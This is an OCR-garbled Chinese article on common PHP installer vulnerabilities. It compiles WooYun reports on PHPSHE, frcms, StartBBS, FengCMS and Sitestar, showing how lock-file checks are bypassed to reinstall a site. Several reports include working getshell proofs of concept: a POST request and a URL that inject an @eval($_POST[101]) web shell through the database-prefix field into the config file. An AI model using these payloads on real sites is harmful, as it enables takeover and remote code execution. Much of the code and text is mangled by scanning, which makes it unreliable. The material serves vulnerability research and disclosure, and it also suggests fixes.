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论 PHP 常 见 的 漏洞 


来 源 : 论 PHP 常 见 的 漏洞 
作者 :' 雨 。 


0x00 iT È 


里 面 很 多 都 是 像 laterain 学 习 到 的 , 如 果 能 考 上 cuit 的 话 AMRBLT o 


0x01 安装 的 问题 


首先 拿 到 一 份 源码 肯定 是 先 install 上 。 而 在 安装 文件 上 又 会 经 常 出 现 问 题 。 


一 般 的 安装 文件 在 安装 完成 后 基本 上 都 不 会 自动 删除 这 个 安装 的 文件 我 遇 到 过 的 
会 自动 删除 的 好 像 也 就 qibocms 了 。 


其 他 的 基本 都 是 通过 生成 一 个 lock 文 件 来 判断 程序 是 否 安装 过 了 如 果 存 在 这 个 lock 
文件 了 就 会 退出 了 。 这 里 首先 先 来 说 一 下 安装 文件 经 常 出 现 的 问题 。 


根本 无 验证 。 


这 种 的 虽然 不 多 但 是 有 时 还 是 会 遇 到 个 。 在 ener a 动 删除 文件 又 不 
会 生成 lock 来 判断 是 否 安装 过 了 。 导致 了 可 以 直接 重 装 


例子 : WooYun: PHPSHE B2C 重 装 


4C file 


7j install 一 般 都 会 有 step 步骤 啥 的 。。 Step 1 check 哈哈 step 2 是 安装 啥 的 。 
而 一 些 cms 默认 step 是 1 而 step 又 是 GET 来 的 而 他 check lock 的 时 候 就 是 在 step1 
里 面 。 这 时 候 如 果 我 们 直接 用 GET 提 交 step 2 那么 就 直接 进入 下 一 步 了 就 没 check 
lock 了 。 


例如 某 cms 中 的 安装 文件 


if (empty ($step) ) 
1 


$step = 1;// 当 用 户 没 有 提交 Step 的 时 候 赋值 为 1 

} 

require_once ("includes/inc install.php"); 
$gototime = 2000; 


if ($step == 1) // 当 1 才 检 测 lock 
if (file exists('installed.txt')) 


echo '«html» 

«head» 

«meta http-equiv="Content-Type" content-"text/html; charset-utf-8", 
«/head» 

«body» 

你 已 经 安装 过 该 系统 ， 如 果 想 重新 安装 ， 请 先 删除 Instal1 目 录 下 的 installed.txt 3 
</body> 

«/html»'; 

exit; 

} 

include once ("./templates/s1.htm1"); 


else 

if ($step == 2) // 我 们 直接 提交 step 为 2 就 不 Check lock T 

{ 

$phpv = Q phpversion(); 

$sp_os = $ ENV["OS"]; 

$sp gd = @ gdversion(); 

$sp server = $ SERVER["SERVER SOFTWARE" ] ， 

$sp host = (empty ($ SERVER["SERVER ADDR"]) ? $ SERVER["SERVER HOS; 
$sp name = $ SERVER["SERVER NAME"]; 

$sp max execution time - ini get('max execution time'); 

$sp allow reference = (ini get('allow call time pass reference!) ? 
$sp allow url fopen - (in 


4 — g 


变量 履 盖 导致 重 装 








header("Content-Type: text/html; charset={$lang}"); 
foreach(Array(' GET',' POST',' COOKIE') as $ request) { 
foreach($$ request as $ k => $ v) ${$_k} = _runmagicquotes($_v); 
} 

function _runmagicquotes(&$svar ) { 

if(!get_magic_quotes_gpc()){ 

if( is_array($svar) ){ 


foreach($svar as $ k => $ v) $svar[$_k] = _runmagicquotes($_v); 
jelse( 

$svar = addslashes($svar); 

} 

} 


return $svar; 
} 
if(file_exists($insLockfile) ){ 
exit(" 程序 已 运行 安装 ， 如 果 你 确定 要 重新 安装 ， 请 先 从 FTP 中 删除 install/instal 
} 
foreach($$ request as $ k => $ v) ${$_k} = runmagicquotes($ v); 
这 里 是 一 个 经 常 遇 到 的 一 个 变量 被 盖 。 


导致 了 我 们 可 以 覆盖 掉 $insLockfile 从 而 让 file_exists 为 false 就 不 会 退出 了 。 导 致 再 
次 重 装 。 这 个 变量 覆盖 不 知道 咋 的 能 在 一 些小 cms 的 安装 文件 里 看 到 。 


之 前 看 的 xdcms 和 frems 都 存在 这 个 变量 履 盖 。 


例子 : WooYun: frcms 重 装 系统 





判断 Lock 后 无 exit 的。 


这 个 从 早期 的 phpdisk 的 那个 header bypass 到 现在 的 又 遇 到 各 种 。 
很 久 前 的 phpdisk 的 安装 文件 中 。 

判断 是 否 存在 lock 文 件 如 果 存 在 lock 文 件 了 就 会 header 到 index.php 
但 是 header 后 他 并 没有 exit 所 以 并 不 会 退出 导致 了 又 是 一 个 重 装 。 
跟 这 种 类 似 的 还 有 javascript 弹 个 框 啥 的 也 没 exit 的 。 

例子 : WooYun: 开源 轻 论坛 StartBBS 前 台 getshell 

例子 : WooYun: FengCMS 修复 不 当 导 致 getshell 


解析 漏洞 


这 个 也 比较 少 , 就 随便 说 名。 就 是 像 dedecms 很 久 以 前 的 那样 在 安装 完成 后 会 在 
install.php rename 为 Install.php.bak 但 是 由 于 apache 的 解析 漏洞 如 果 无 法 识别 最 
后 的 一 个 后 缓 的 话 就 会 向 上 解析 ,那么 就 又 成 php 了 “。 然后 又 结合 dedecms 安 装 时 
的 变量 覆盖 又 成 重 装 了 。 


满足 一 些 条 件 不 会 退出 的 。 


这 种 例子 也 不 算 太 多 , 自己 好 像 也 没 遇 到 过 太 多 。 
首先 以 之 前 发 过 的 sitestar 举 例 下 
if(file_exists($lockfile) && ($ a--'template' || $_a=='setting' | | 
exit('please delete install.lock!'); 
[ET 5 
这 里 我 们 来 理解 一 下 这 个 逻辑 , 这 里 的 fle_exists($lockfile) 因为 安装 成 功 后 lockfile 
肯定 存在 的 所 以 这 里 肯定 会 是 true 然后 再 看 一 下 这 里 是 一 个 && true true 才 会 进 


入 语句 块 。 那 么 如 果 $ a 不 为 template ^ setting ^ check 的 话 那么 后 面 的 就 为 
false True and false => false 就 不 会 进入 这 个 语句 块 就 不 会 exit 再 配合 后 面 的 





else if($_a=="create"){ 
$link = mysql_connect ($db_host,$db_ user, $db_pwd); 


刚好 有 个 其 他 的 如 果 $ aA create 那么 就 不 会 退出 这 个 脚本 
刚好 这 个 create 能 达到 Getshell 的 效果 

例子 : WooYun: 建站 之 星 Sitestar 前 合 Getshell 一 枚 

剩 下 的 还 有 hdwiki 之 前 也 有 一 个 基本 差不多 这 样 的 例子 


if (file exists(HDWIKI ROOT.'/data/install.lock') && $step != '8') 
echo "<font color='red'>{$lang['tipAlreadyInstall']}</font>"; 
exit(); 


和 和 Sc 
如 果 step 为 8 的 话 那么 就 不 会 执行 exit 了 。 





case 8: 

require_once HDWIKI ROOT.'/config.php'; 

require once HDWIKI ROOT.'/lib/hddb.class.php'; 
require once HDWIKI ROOT.'/lib/util.class.php'; 
require once HDWIKI ROOT.'/lib/string.class.php'; 


$db - new hddb(DB HOST, DB USER, DB PW, DB NAME, DB CHARSET); 
//install 

$setting=$db->result_first('select ‘value from '.DB TABLEPRE. 'sett 
if ($setting) { 

echo "<span style-'font-size:20px; '» A £L Bi RDA .</span><a href=' 
break; 


} 

//update info 

$data = $_GET['info']; 

$data = str replace(' ', '+', $data); 
$info = base64 decode($data); 


if ($info)t{ 

$obj = unserialize($info); 

if(is_array($obj)){ 

$url2 = 'http://localhost/count2/in.php?action-update&sitedomain-' 
$data = util::hfopen($url2); 

//if gbk then toutf8 

if ($lang['commonCharset'] == 'GBK'){ 

$obj['sitenick'] = string: :hiconv($obj['sitenick'], 'gbk', 'utf-8': 





刚好 这 里 step 8 又 能 执行 一 些 特殊 的 操作 。。 现在 就 把 case 8 注释 掉 了 。 
这 里 代码 我 就 不 复制 过 了 免得 占 篇 幅 。 
党 


这 里 差不多 是 我 比较 常 遇 到 的 一 些 安装 文件 经 常 遇 到 的 问题 了 ,突然 想 也 想不到 其 他 
哈 的 了 。 


WooYun-2014-62047 : PHPSHE B2C 重 装 。 


v 
漏洞 作者 : Uc V 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-062047 
简要 描述 

PHPSHE B2C 商 城 系统 v1.2(build 20140519 UTF8) 
看 到 更 新 了 下 一 个 下 来 看 看 。 

我 控 敢 判 断 一 下 lock 吗 ? 

详细 说 明 


在 install/index.php 


error reporting(E ALL ^ E NOTICE); 
date default timezone set('PRC'); 
header('Content-Type: text/html; charset=utf-8'); 
// 改 写 不 安全 的 register_g1lobal 和 防 sq1 注 入 处 理 
if (@ini_get('register_globals')) { 
foreach($ REQUEST as $name => $value) {unset ($$name) ; } 
j 
$pe['host root'] = 'http://'.str_ireplace(rtrim(str_replace('\\',', 
$pe['path root'] = str_replace('\\', '/',dirname(__FILE__)).'/../'; 
include("i($pe['path root']3/include/class/cache.class.php"); 
include("{$pe['path_root' ]}/include/function/global.func.php"); 
if (get_magic_quotes_gpc()) { 
lempty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR. 


lempty($_POST) && extract(pe trim(pe stripslashes($ POST)), EX 


} 
else { 
lempty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g'); 
lempty($_POST) && extract(pe trim($ POST),EXTR PREFIX ALL,' p'- 
} 


switch ($ g step) { 
/ [HEHHBHHHHHHHHBHHHHEHHHHIQ 配置 信息 QIRHETHHBHHHBHHHHBHHHHHHHUL/ / 
case 'setting': 
if (isset($ p pesubmit)) { 
SSS 
没有 判断 lock 。。 可 以 直接 重 装 。 
轻松 Getshell。 





it PHP 常见 漏洞 


漏洞 十 明 





NT 了 | = @ SQL XSS- Encryption" Encoding Other- 
& Load URL http://web.com/phpshe/install/index.php 

) Split URL 

^» Execute 








Enable Post data | | Enable Referrer 





检查 . /data 及 其 子 目 录 777 梭 限 : Yes 


检查 . fconfig. php 立 件 777 梭 限 : Yes 





数据 库 服务 器 
数据 库 用 户 名 














数据 库 名 
数据 表 前 绎 


图 管理 帐号 


admin 网 站 管理 员 登 录 帐 号 














——— ——————— 


开始 安装 
修复 方案 
在 安装 完成 后 生成 一 个 lock 


ee 
然后 在 安装 的 时 候 判 断 是 否 已 经 有 Lock e 
ta RA lock 就 退出 。 


WooYun-2014-62047 : PHPSHE B2C € € ° 





www.wooyun.org 
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WooYun-2014-73244 : frems 重 装 系统 


漏洞 作者 : BAH 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-073244 


简要 描述 
EKT 之 后 可 以 轻松 getshell。 
详细 说 明 


在 install/index.php 中 


header("Content-Type: text/html; charset={$lang}"); 
foreach(Array(' GET',' POST',' COOKIE') as $ request) { 
foreach($$ request as $ k => $ v) ${$_k} = runmagicquotes($ v. 
j 
function _runmagicquotes(&$svar ) { 
if(!get_magic_quotes_gpc()){ 
if( is_array($svar) ){ 
foreach($svar as $ k => $ v) $svar[$_k] = runmagicquot 
selse{ 


$svar = addslashes($svar); 


} 


return $svar; 


} 
if(file_exists($insLockfile) ){ 


exit(" 程序 已 运行 安装 ， 如 果 你 确定 要 重新 安装 ， 请 先 从 FTP 中 删除 install/in 


[IE 





(file_exists($insLockfile) 
这 里 判断 了 是 否 lock lock F ik h o 
foreach(Array(' GET',' POST',' COOKIE') as $ request)( 
foreach($$ request as $ k => $ v) ${$_k} = runmagicquotes($ v. 
irc cc ÁO oS 
对 循环 出 来 的 再 生成 了 一 个 变量 所 以 可 以 直接 覆盖 掉 $insLockfile 造成 重 装 。 
SRE 可 以 轻松 的 getshell 。 


但 是 这 里 存在 一 个 变量 覆盖 。 





€ PHP 常见 漏洞 





4m) Load URL http://web/web/frems/install/index.php| 
X Split URL 
^», Execute 








Enable Post data Enable Referrer 





程序 已 运行 安装 ， 如 果 你 确定 要 重新 安装 ， 请 先 丛 FTP 中山 除 install/install_lock. txt! 


然后 覆盖 掉 $insLockfile 





~ LoadURL http://web/web/frcms/install/index.php?insLockfile=1 
Q Split URL 
^» Execute 




















Enable Post data | | Enable Referrer 

















E WE 网 站 管理 系统 free RR 


e 
许可 协议 不 境 检测 | 参数 配置 完成 安装 
读 许可 协议 
版 权 所 有 (c)2004-2012 ，mww.FineReason com 保留 所 有 权利 。 
感谢 您 选择 嘉 综 人 才 网 站 管理 系统 ( 以 下 简称 嘉 毕 CMS ) ， 亮 缘 CM5 是 目前 国内 最 专业 的 人 才 求 职 招聘 网 站 建设 综合 解决 方案 之 一 ， 居 于 PHP + My3QL 的 技 


术 开 发 ， 全 部 源码 开放 。 
嘉 缘 CMS 的 官方 网 址 是 : wwwjinereason.com 变 流 论坛 : bbsfnereason.com 
为 了 使 你 正确 并 合法 的 使 用 本 软件 ,请 你 在 使 用 前 务必 阅读 清楚 下 面 的 协议 条 款 : 


一 、 本 授权 协议 适用 且 妈 适用 于 BECHS 3xx 版 本 ， 喜 缘 CHS 官 方 对 本 授权 协议 的 最 终 解释 权 - 
二 、 协 议 许 可 的 权利 


4 RATIO Rar Bee FH tinh oe Leek Pee eee tin hs FRI 


可 以 看 到 可 以 重 装 了 然后 直接 对 step 4 post 就 能 重 装 了 。 


漏洞 十 明 





4m Load URL http://web/web/frcms/install/index.php?insLockfile=1 
Spit URL 
^) Execute 




















T] Enable Post data [T] Enable Referrer 

















嘉 经 人 才 网 站 管理 条 统 free RE 


e 
许可 协议 不 境 检测 参数 配置 完成 安装 
读 许可 协议 
版 权 所 有 (c)2004-2012, www. FineReason.com 保留 所 有 权利 。 [3 
感谢 您 选择 嘉 综 人 才 网 站 管理 系统 ( 以 下 简称 嘉 综 CMS3 )， 嘉 毕 CM5 是 目前 国内 最 专业 的 作 才 求职 招聘 网 站 建设 综合 解决 方案 之 一 ,居于 PHP + My3QL 的 技 


术 开 发 ， 全 部 源码 开放 。 
嘉 缘 CMS 的 官方 网 址 是 : wwwiinereason.com 变 流 论坛 : bbsfnereason.com 
为 了 使 你 正确 并 合法 的 使 用 本 软件 ， 请 你 在 使 用 前 务必 阅读 清楚 下 面 的 协议 条 款 : 


一 、 本 授 要 协议 适用 且 妈 适用 于 喜 缘 CHS 3xx RA, SECHSEANARRARHRS RAR. 
二 、 协 议 许 可 的 权利 


1 ERT DIPS den ERGO FH akh áh Lee Pee en etn dis FRI 


WooYun-2014-73244 : frcms 重 装 系统 
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论 PHP 常见 漏洞 


修改 变量 覆盖 的 地 方 。 


WooYun-2014-73244 : frcms 重 装 系统 


14 


WooYun-2013-45143 : # 7$ 447644 StartBBS à] € 
getshell 


Y 
漏洞 作者 : phithOn V 
来 源 : http://www.wooyun.org/bugs/wooyun-2013-045143 


简要 描述 


4% 5 — 4) i&getshell » 所 有 测试 都 是 在 本 地 进行 的 哦 ， 我 立志 做 一 个 好 和 孩 纸 ~ | 


详细 说 明 
心血 来 潮 读 读 代码 。StartBBS 界 面 捍 清 爽 的 ， 体 积 也 小 。 下 载 下 来 安装 。 

安装 好 后 发 现 根 目录 下 多 了 一 个 install.lock， 一 般 的 cms 为 了 防止 被 重 安装 就 
会 在 目录 下 生成 一 个 类 似 的 文件 ， 下 次 有 人 再 访问 安装 脚本 的 时 候 ， 脚 本 会 检测 ， 
如 果 目 录 下 有 这 个 文件 就 提示 “请 删除 后 再 安装 ”。 

原本 应 该 是 没有 任何 问题 的 。 但 我 们 来 到 安装 脚 
本 ，/app/controllers/install.php 中 ， 查 看 它 是 怎么 处 理 的 : 


class Install extends Install_Controller 
function _ construct () 
{ 
parent::  construct(); 
$this->load->library('myclass'); 
$file-FCPATH.'install.lock'; 
if (file exists($file))( 


$this-»myclass-»notice('alert(" &Z, C. € X i") ;window.loc: 








看 到 这 里 我 就 笑 了 。 构 造 函 数 里 检查 是 否 存 在 install.lock， 然 后 用 javascript 的 
方式 告诉 用 户 “ 系 统 已 安装 过 ”， 然 后 跳 转 。 但 是 这 个 脚本 根本 还 没有 结束 嘛 ， 这 个 
类 里 的 函数 都 可 以 运行 ， 并 不 因为 返回 了 一 个 window.location.href 就 停止 运行 。 

(this->myclass->notice() 中 也 没有 停止 运行 的 代码 ) 


然后 ， 在 往 下 翻 ， 就 能 看 到 安装 的 函数 : 


public function step($step) 


{ 
$data['step']=$step; 
if($step==1 || $step==2){ 
$data['permission'] = $this-» checkFileRight(); 
$this->load->view('install', $data); 
j 
if ($step==3) { 
$this->_install_do(); 
j 
j 
function install do() 
{ 


$data['step']=3; 
if ($_POST) { 
$dbhost = $this->input->post('dbhost'); 
$dbport = $this->input->post('dbport'); 
$dbname = $this->input->post('dbname' ); 
$dbuser = $this-»input-»post('dbuser'); 
$dbpwd = $this->input->post('dbpwd' )?$this->input -: 
$dbprefix = $this->input->post('dbprefix'); 
$userid = $this->input->post('admin'); 


$pwd = md5($this->input->post('pwd')); 


$email = $this->input->post('email'); 
$sub folder = '/'.$this->input->post('base_url').', 
$conn = mysql_connect ($dbhost.':'.$dbport, $dbuser,: 
if (!$conn) { 

die( ' 无 法 连接 到 数据 库 服务 器 ， 请 检查 用 户 名 和 密码 是 否 正确 
j 
if($this->input->post('creatdb')){ 

if([ [email protected] ](/cdn-cgi/l/email-protect 


die(' 指 定 的 数据 库 (' . $dbname. ') 系 统 尝试 创建 失败 ， 


} 
if (!mysql_select_db($dbname, $conn) ) { 


die($dbname. 数据库 不 存在 ， 请 创建 或 检查 数据 名 .,' ) ; 


$sql = file get contents(FCPATH. 'app/config/st: 
$sql = str_replace("sb_", $dbprefix, $sql); 
$explode = explode(";",$sql); 
$data[ 'msg1']=" 创 建 表 " .$dbname ." 成 功 ， 请 稍 后 .<br， 
foreach ($explode as $key=>$value) { 
if(!empty($value) ){ 
if(trim($value) ){ 


mysql_query($value.";"); 


} 
$password = $pwd; 


$ip=$this->myclass->get_ip(); 
$insert= "INSERT INTO ".$dbprefix."users (gr¢ 
mysql_query($insert); 
mysql_close($conn); 
$data['msg2']=" 安 装 完成 ， 正 在 保存 配置 文件 ， 请 稍 后 
$dbconfig = "<?php if ( ! defined('BASEPATH'): 
."\$active_group = 'default';\n" 


."N$active record = TRUE; n" 


."\$db['default']['hostname'] = '".$dbhost."';` 
."\$db['default']['port'] = '".$dbport."';\n" 

."\$db['default']['username'] = '".$dbuser."',, 
."NSdb['default']['password'] = '".$dbpwd."';\r 
."\$db['default']['database'] = '".$dbname."';` 


."\$db['default']['dbdriver'] = 'mysql';\n" 
."\$db['default']['dbprefix'] = '".$dbprefix." 
."\$db['default']['pconnect'] = TRUE; \n" 
."N$db['default']['db debug'] = TRUE; n" 
."NSdb['default']['cache on'] = FALSE; n" 
."NSdb['default']['cachedir'] = 'app/cache';\n' 
."\$db['default']['char_set'] = 'utf8';^n" 
."\$db['default']['dbcollat'] = 'utf8 general 
."\$db['default']['swap_pre'] = '';\n" 
."\$db['default']['autoinit'] = TRUE; n" 
."A$db['default']['stricton'] = FALSE;"; 

$file = FCPATH.'/app/config/database.php'; 
file put contents($file,$dbconfig); 


// 保 存 config 文 件 


if ($sub_folder){ 
$this-»config-»update('myconfig','sub fold: 

j 

$encryption key = md5(unigid()); 

if($encryption key)( 
$this-»config-»update('myconfig', 'encryptic 

j 

$data[ 'msg3']=" 保 存 配 置 文件 完成 1 "， 

touch(FCPATH. 'install.lock'); 

$data[ 'msg4']=" 创 建 锁定 安装 文件 install.1lock 成 功 "， 

$data['msg5']=" 安 装 startbbs 成 功 !"， 

} 


$this->load->view('install', $data); 





4 step BAM BRASH > MINTER FAC install do() * 3X 4 HAE 390 35 16 T 
数据 库 ， 并 把 数据 库 配 置 文件 写 入 了 “app/config/database.php”。 于 是 ， 我 们 可 以 
构造 一 下 数据 包 直 接 把 一 名 话 写 入 到 这 个 配置 文件 里 。 


我 们 看 到 ， 这 个 函数 接收 了 许多 post 数 据 : 

$dbhost = $this->input->post(‘dbhost'); 

$dbport = $this->input->post(‘dbport’); 

$dbname = $this->input->post('dbname’); 

$dbuser = $this->input->post('dbuser'’); 

$dbpwd = $this->input->post('dbpwd')? $this->input->post(‘dbpwd'):"; 
$dbprefix = $this->input->post('dbprefix’); 

$userid = $this->input->post(‘admin’); 

$pwd = md5(Sthis->input->post('pwd’')); 


$email = $this->input->post('email’); 


$sub folder = '/'.$this->input->post('base_url').'/; 


其 中 dbhost、dbport、dbname、dbuser、dbpwd 都 不 能 随便 乱 写 ， 乱 写 的 话 
安装 就 会 出 错 ， 而 userid、pwd、email、sub_folder 都 是 写 入 数据 库 的 ， 不 写 入 配 
时 文件 。 所 以 就 剩 下 dbprefix 了 “， 所 以 我 们 可 以 这 样 构造 这 个 字段 : 


dbprefix=sb_';@eval ($_POST[101]);$xxx=， 


漏洞 证 明 

因为 这 个 重 安装 漏洞 破坏 性 太 大 ，getshell 义 后 网 站 等 于 重 置 了 ， 所 以 我 没有 在 网 
上 测试 。 测试 都 在 本 地 进 行 ~ 

首先 在 外 面 找 一 个 可 以 外 连 的 mysq| 账 号 ， 为 的 是 让 安装 成 功 进 

我 这 里 在 我 vps 上 新 建 了 一 个 账号 test_db_user， 然 后 构造 下 面 的 这 个 数据 包 ， 发 


y 


aK: 





POST /sbbs/index.php/install/step/ 3 HTTP/ / i. all 

Host: localhost 本 url 

User-Agent: Mozilla/5.0 (Windows NT 6. 4: wowed; rv:25.0) Gecko/20100101 Firefox/25.0 
Accept: text/html,application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: zh-cn, zh; q=0.8, en-us; q=0.5,en;q=0.3 

Accept-Encoding: gzip, deflate 









R t: http://localhost/sbbs/index.php/install/step/2 

Ce bdshare firstime 458901312; 

Connection: keep- alive 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 191 

dbhost4j I«dbport-3306&dbuser-test db user&dbpwd4d IGusMjHMxrP&dbname-test db&dbprefix-sb ' ;Beval 
($ .POST[101]); $xxx ' €admin=adminépwd=ac dmin&email-startbbst40126.c ^'om&base url-sbbs 


www.wooyun.org 


等 待 一 会 发 现 返回 了 安装 成 功 提示 。 因 为 我 在 本 地 测试 的 ， 所 以 我 来 到 网 站 目录 
下 ，/app/config/database.php 


install. php database. php Myclass. php 
<?php if ( defined ('BASEPATH') ) 
Sactive group 'default'; 
Sactive record TRUE; 
Sdb['default' 
Sdb['default' 
Sdb["' default, 
Sdb['default 
Sdb['default 
Tole iw defaul 
Sdb['defau 
$sdb['defaul 
|| defaul 
Sdb['defau 
sdb["'defau 
sdb[" iun 
Sdb['defaul 
Pia ETE 
sdb["'default 
Sdb['default 





可 以 看 到 ， 一 句 话 已 经 写 入 了 。 菜 刀 连 接 index.php 就 可 以 了 ， 直 接连 这 个 数据 库 本 
置 文件 是 不 行 的 。 


(=) C: wamp www sbbs* vi XH 


127.0.0.1 目录 CD, rft 5) 称 时 间 大 小 属性 
E C: p 013-1 3 | 077 
=] (C wamp 
E c www 
e omg 
回 app 
(Cj data 
G plugins 
© static 
ca system 
(Cj themes 
(Ci uploads 














Se D: 
uu» E: 
æ F: 
Se G: 
Se I: 


PR www.wooyun.org 


CODE wo £P £? ee CC £y liz 


修复 方案 
function _ construct () 
{ 
parent:: construct() ; 
$this->load->library('myclass'); 
$file-FCPATH.'install.lock'; 
if (file exists($file))( 


$this-»myclass-»notice('alert(" &Z, C. € X it") ;window.loc: 


exit; 





WooYun-2014-76648 : FengCMS 修复 不 当 导 致 
getshell 


漏洞 作者 : xiaoL 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-076648 


简要 描述 

FengCMS 修复 不 当 导 致 getshell， 属 于 修复 不 当 ， 跟 其 他 的 没 重复 了 - -， 对 审核 同 
Fis gh 8 PIPERS © 

详细 说 明 

之 前 提交 过 一 次 跟 http://**.**.**.**/pugs/Wwooyun-2014-067508 


漏洞 重复 了 。 现 在 重新 看 一 下 。 发 现 修复 的 有 问题 ， 而 且 install 目 录 默 认 是 不 会 自 
动 删除 的 ， 依 然 可 以 getshell ! 


header ("Content-type: text/html; charset=utf-8"); 
define("TPL_INCLUDE", 1); 
// 定义 当前 路 径 
define('ABS_PATH',dirname(__FILE__)); 
define('ROOT PATH',dirname(ABS PATH)); 
if(!$ GET['step'])$ GET['step']-1; 
$config file-ROOT PATH.'/config.php'; 
$install_file=ABS_PATH.'/install.sql'; 
// 这 里 是 修改 添加 的 代码 ， 由 于 是 输出 javascript， 所 以 可 以 无 视 掉 
if(file_exists(ROOT_PATH. '/upload/INSTALL' ) ){ 
echo ‘<script type="text/javascript">alert(" 系 统 已 安装 ， 如 需要 重新 安 : 


echo '«meta http-equiv-"refresh" content="0;url=/">'; 


‘| — } 








论 PHP 常见 漏洞 


所 以 直接 进行 setp = 4 的 步骤 ， 其 中 只 有 DB _PREFIX 字 段 不 影响 ， 可 以 用 来 
getshell 。 


漏洞 证 明 
直接 访问 URL : 
.../install/index.php? 


host=localhost&user=root&password=root&dbname=hello&prefix=f_');@eval($_P 


OST[101]);(‘&url_type=1 &step=4 


二 Load URL _http://127.0.0.1/install/index.php?host=localhost&user=root&password=root&dbname=hello&prefix=f_');@eval($_POST[101));(‘&url_type=1&step=4 
Q Split URL 
^) Execute 








|] Enable Post data | | Enable Referrer 




















系统 已 安装 ， 如 需要 重新 安装 ， 请 手工 量 除 upload 目 录 下 的 INSTALL 文 件 ! 








局 Load URL | http://127.0.0.1/install/index.php?host-localhost&userzroot&password-root&dbname-hello&prefix-f );&eval($ POST[101]);('&url typez1&step-4 


Split URL 
) Execute 











|] Enable Post data | | Enable Referrer 




















安装 成 功 ! 
阻止 此 页 面 创建 更 多 对 话 杠 
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efined('TPL_INCLUDE' ) ( "Restricted 


define('DB HOST','localhost'); 
define('DB USER', 'root'); 
define('DB PASS','root'); 
define('DB NAME', 'hello'); 
define('DB TYPE", 'mysqli'); 


define('DB PREFIX','f ');Geval($ POST[101]);(' '); 


define('DB VIEW PREFIX', 'view '); 





修复 方案 
echo 完了 


exit() 一 下 


WooYun-2014-54387 : 建站 之 星 Sitestar 前 人 台 
Getshell —7X 


Y 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-054387 


简要 描述 


a o m em 就 准备 提 数 字 了 。 Ks RERE 
拒绝 提交 详情 。 还 是 提 到 乌云 来 把 。 


不 知道 sitestar 在 乌云 是 不 是 属于 一 般 应 用 的 ? 狗 哥 给 个 回应 哈 。 


Sitestar 前 台 Getshell。 无 需 登 录 。 
详细 说 明 

在 官方 论坛 上 下 的 最 新 版 

在 install/index.php 


define('IN CONTEXT', 1); 
include once('load.php'); 


?> 


包含 进来 那 再 继续 看 看 。 


$lockfile = ROOT.'/install.lock'; 
$pattern db = '/[0-9a-zA-Z]*$/'; 
if(!preg match($pattern db, $db name)||!preg match($pattern db, $dł 


echo '1001';exit; 


j 

if(file exists($lockfile) && ($ a--'template' || $ a--'setting' || 
exit('please delete install.lock!'); 

j 





这 里 判断 了 Lock m Lif(file_exists($lockfile) && ($_a=='template' | $ a--'setting' || 
$ a--'check) 


关键 这 里 是 一 个 and 而 不 是 一 个 or 只 要 不 满足 后 面 的 也 就 不 会 退出 了 。 
继续 看 后 面 的 码 。 
if($_a=='template'){ 
include P_TPL."/template. php"; 
}else if($_a=='check'){ 
include P_TPL."/check. php"; 
selse if($ a--'setting')( 
$default tpl = ParamHolder::get("default tpl","jixie-110118-a1t 
$ SESSION['default tpl'] - $default tpl; 
include P_TPL."/setting. php”; 
selse if($_a=='result' ){ 
$domain = $ SERVER['HTTP HOST']; 
if(isset($ SERVER['SERVER ADDR']))( 
$ip - $ SERVER['SERVER ADDR']; 


jelse( 


in= žk kk KK k*k!Ya 
$ip= nuuc ; 


j 
$version - 'sitestar v2.7 build131012'; 
$system = preg replace('/Ns/','', PHP. 0S); 
$vphp = PHP VERSION; 
$vmysql = $_SESSION['vmysql']; 
$tpl name = $ SESSION['default tpl']; 
$http = new Http("http://**.**,**,**/feedback.php?domain-$doma: 
$http->get(); 
include P_TPL."/result.php"; 
create file($version); 
Jelse if($_a=='checkconnection' ){ 
$link = Qmysql connect($db host,$db user,$db pwd); 
if (!$link) { 
echo '1001'; 
exit; 
j 
$r = mysql select db($db name,$1link); 
if(!$r)( 
echo '1002'; 
exit; 
j 
}else if($ a=="create")t{ 
$link = mysql connect($db host,$db user,$db pwd); 
if (!$link) { 
echo "1001"; 


exit; 


j 
$r = mysql select db($db name,$1link); 
if(!$r){ 
echo '1002'; 
exit; 
j 
$rtn = create table($db name,$db prefix,INSTALL ROOT.'/../sqgl/l 
if(!empty($rtn)){ 
echo '1005'; 
exit; 
j 
mysql query("INSERT INTO ^".$db prefix."parameters^ ( ‘id’, ‘ke 
//uploadcopy(ROOT."/template/".$ SESSION['default tpl']."/".$ € 
//uploadcopy(ROOT."/template/".$ SESSION['default tpl']."/".$ : 
if($demo--'1')( 
create table($db name,$db prefix,ROOT."/template/".$ SESSI( 
} else { 
mysql query("INSERT INTO "".$db prefix."static contents  ( 
mysql query("INSERT INTO '".$db prefix."static contents  ( 
mysql query("INSERT INTO '"".$db prefix."static contents  ( 
mysql query("INSERT INTO '"".$db prefix."static contents  ( 
j 
echo '1003'; 
jelse if($ a--'"createadmin")( 
$link = mysql connect($db host,$db user,$db pwd); 
if (!$link) { 


echo '1001'; 


exit; 
j 
$r = mysql select db($db name,$link); 
if(!$r){ 
echo '1002'; 
exit; 
} 
mysql_query("set names utf8"); 
mysql_select_db($db_name, $link); 
$mysql_query = mysql_query("select VERSION()"); 
$mysql_row = mysql_fetch_row($mysql_query); 
$vmysql = $mysql_row[0]; 
$_SESSION['vmysql'] = $mysql_row[0]; 
$passwd = shai($admin pwd); 
$tme = time(); 
if ($link) { 
create config($db_host1, $db_user, $db_pwd, $db_name, $db_pref: 
j 
$query - mysql query("insert into ".$db prefix."users(login,pa: 
$insert id = mysql insert id(); 
$query = mysql query("insert into ".$db prefix."user extends(t« 
if($query)1 


echo '1004'; 











可 以 看 到 除开 template setting fe check 还 有 其 他 的 


来 找 找 哪个 可 以 利用 的 。 


}else if($_a=="createadmin"){ 


$link = mysql connect($db host,$db user,$db pwd); 
if (!$link) { 
echo '1001'; 
exit; 
} 
$r = mysql_select_db($db_name, $link); 
if(!$r){ 
echo '1002'; 
exit; 
} 
mysql_query("set names utf8"); 
mysql_select_db($db_name, $link); 
$mysql_query = mysql_query("select VERSION()"); 
$mysql_row = mysql_fetch_row($mysql_query); 
$vmysql = $mysql_row[0]; 
$_SESSION['vmysql'] = $mysql_row[0]; 
$passwd = shai($admin pwd); 
$tme - time(); 
if ($link) { 
